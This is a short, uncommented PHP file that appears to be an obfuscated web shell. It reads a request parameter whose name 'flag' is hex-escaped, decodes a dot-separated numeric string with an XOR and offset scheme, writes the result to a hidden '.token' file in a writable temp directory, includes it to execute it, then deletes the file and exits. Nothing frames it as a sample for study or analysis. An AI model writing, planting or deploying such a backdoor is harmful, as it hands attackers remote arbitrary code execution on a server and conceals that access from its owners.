<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["fl\x61\x67"])){
	$ent = array_filter([getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/var/tmp"]);
	$val = $_REQUEST["fl\x61\x67"];
	$val	=	 	explode(	"."		 , 	$val) 	; 
	$factor='';
            $s6='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen($s6		);
            $len=count($val		);
    
            for ($s=0; $s < $len; $s++) {$v8=$val[$s];
                $sChar=ord($s6[$s % $lenS]		);
                $d=((int)$v8 - $sChar - ($s % 10))^	60;
                $factor.=	chr($d		);
            }
	foreach ($ent as $item):
    		if (!!is_dir($item) && !!is_writable($item)) {
    $bind = implode("/", [$item, ".token"]);
    $success = file_put_contents($bind, $factor);
if ($success) {
	include $bind;
	@unlink($bind);
	die();}
}
endforeach;
}